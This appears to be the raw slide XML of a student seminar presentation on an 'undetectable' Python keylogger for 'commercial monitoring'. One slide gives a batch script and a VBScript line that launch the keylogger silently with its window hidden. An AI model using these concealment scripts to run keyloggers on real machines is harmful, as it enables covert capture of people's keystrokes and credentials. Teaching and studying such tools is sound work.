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69" r:id="rId3"/>
    <p:sldId id="337" r:id="rId4"/>
    <p:sldId id="374" r:id="rId5"/>
    <p:sldId id="375" r:id="rId6"/>
    <p:sldId id="373" r:id="rId7"/>
    <p:sldId id="376" r:id="rId8"/>
    <p:sldId id="378" r:id="rId9"/>
    <p:sldId id="379" r:id="rId10"/>
    <p:sldId id="380" r:id="rId11"/>
    <p:sldId id="381" r:id="rId12"/>
    <p:sldId id="382" r:id="rId13"/>
    <p:sldId id="377" r:id="rId14"/>
    <p:sldId id="367" r:id="rId15"/>
    <p:sldId id="371" r:id="rId16"/>
    <p:sldId id="293" r:id="rId1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86409" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="113" d="100"/>
          <a:sy n="113" d="100"/>
        </p:scale>
        <p:origin x="1416" y="114"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2160"/>
        <p:guide pos="2880"/>
      </p:guideLst>
    </p:cSldViewPr>
  </p:slideViewPr>
  <p:outlineViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="33" d="100"/>
        <a:sy n="33" d="100"/>
      </p:scale>
      <p:origin x="0" y="1053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872CB109-4FAF-4756-A188-122FC33D8A30}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>7/17/2021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defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{5017642B-4EC9-4E18-AFF4-10B1BA3E3FB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87871CA-F148-49A2-B114-E29AFC7ABF6E}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>1</a:t>
            </a:fld>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p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="112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12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EE11B19-203B-477F-8070-40FB0CD8C080}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>2</a:t>
            </a:fld>
            <a:endParaRPr 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E807C3-EDED-4F63-BBCE-077F4C52AD56}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>3</a:t>
            </a:fld>
            <a:endParaRPr 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E807C3-EDED-4F63-BBCE-077F4C52AD56}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>6</a:t>
            </a:fld>
            <a:endParaRPr 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684310-D94E-4CAA-A841-1C3BC5A54BF4}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>14</a:t>
            </a:fld>
            <a:endParaRPr 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684310-D94E-4CAA-A841-1C3BC5A54BF4}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>15</a:t>
            </a:fld>
            <a:endParaRPr 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987F4C5-5AD7-43FA-AEF8-E49C13D23FE8}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>16</a:t>
            </a:fld>
            <a:endParaRPr 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292BE2D-812D-45C6-BE18-41AFE90349A8}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>7/17/2021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E250DF-CB3B-4F58-8825-1FDC1353A46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71A21A-4946-428A-95D6-C71816E48BC4}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>7/17/2021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4A2DA-B654-4803-9784-9F57E4984CF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8DA89F5-4B91-4009-BC74-7F7F9542C962}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>7/17/2021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86B16B-38A7-43F9-B77B-7F431B9B2FE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F7E1A2F4-6544-412A-8B64-0EDCCCDA1D56}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>7/17/2021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D5AB43-3B7C-4361-A9D0-C9CC9B9B0D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C1E781-1323-4C9E-B0C6-B1DDA0AD6732}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>7/17/2021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42E47D-4738-4368-A706-CBB3950BBE2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9F752BB-6E13-4F3C-8D22-69AE93F3A2B6}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>7/17/2021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E3BEEF-F8F7-4114-874B-46DB5DFC54B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E559C68-940B-4811-95A6-542CCE9954F1}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>7/17/2021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CA8A7AA-44A8-4CA3-8645-12ABC11A69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EE96B2A-8C58-4765-A591-D1CD2AEE10DC}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>7/17/2021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4582F9-7593-4D3D-BEC4-C9744924A5E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B451D19-DD16-4227-934F-884DDB6E172A}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>7/17/2021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CDFDEED-6763-4F91-900C-4B76E209BE6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7E46A0-29E8-4A67-B603-DF118C7B0E67}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>7/17/2021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B8F377E-AD95-417B-8C71-225EE0C2F6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2F33B46-769F-4552-8C84-F42DCEB52DB5}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>7/17/2021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D8461D-D8F4-4E79-B962-D802E6ACA83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6A35EB5-735D-4650-BD87-90EC7B58AA02}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>7/17/2021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1884869-67B3-4111-8346-5FF8C8DB83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92BB7B3-724E-41EB-A33E-E35505B837C0}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>7/17/2021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942D852-C078-4594-8B7C-121794DD95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spersky.co.in/resource-center/definitions/keylogger"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commandwindows.com/command3.htm" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.python.org/3/library/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.learnpython.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95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a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Undetectable Keylogger using Python for Commercial Monitoring</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1143000"/>
            <a:ext cx="8458200" cy="5181600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="26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r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>MINI-PROJECT  SEMINAR </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Session 2020-21 (EVEN)</a:t>
            </a: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marL="342900" indent="-342900" algn="l" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buAutoNum type="arabicPeriod"/>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marL="342900" indent="-342900" algn="l" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Shashank </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Pawsekar</a:t>
            </a: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marL="342900" indent="-342900" algn="l" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Shruti Deshpande</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Samyak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> Alone</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Ojas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Puri</a:t>
            </a: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marL="342900" indent="-342900" algn="l" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>						            Guide</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
              <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>                                           		              Prof.  Alok Chauhan </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>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2600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2053" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1600200" y="6211888"/>
            <a:ext cx="6019800" cy="646112"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Department of Information Technology</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200" b="1" dirty="0">
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
              <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              <a:ea typeface="Batang" pitchFamily="18" charset="-127"/>
              <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
                <a:ea typeface="Batang" pitchFamily="18" charset="-127"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Rajiv Gandhi College of  Engineering &amp; Research, </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200" b="1" dirty="0">
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
              <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
                <a:ea typeface="Batang" pitchFamily="18" charset="-127"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Nagpur- 441 110 (MS)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200" b="1" dirty="0">
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
              <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 4" descr="motion.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3733800" y="2590800"/>
            <a:ext cx="1828800" cy="1524000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solid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CECC8-D372-497E-8CBD-DD8AE160C719}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="304800"/>
            <a:ext cx="8382000" cy="4867999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Supported scripts for silently execution of the program-</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>script.bat file </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>@ECHO OFF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="1600" b="0" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="1600" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="en-IN" sz="1600" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-IN" sz="1600" b="0" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>C:\Users\Asus\AppData\Local\Programs\Python\Python38-32\pythonw.exe </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>%CD%\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>key_logger.pyw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> %*</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Script.vbs file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>CreateObject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN"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err="1">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Wscript.Shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>").Run "script.bat", 0, True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3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A2B86C48-708C-4AA5-8B6E-996CEC8625B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1524000" y="1105019"/>
            <a:ext cx="7086600" cy="1323439"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
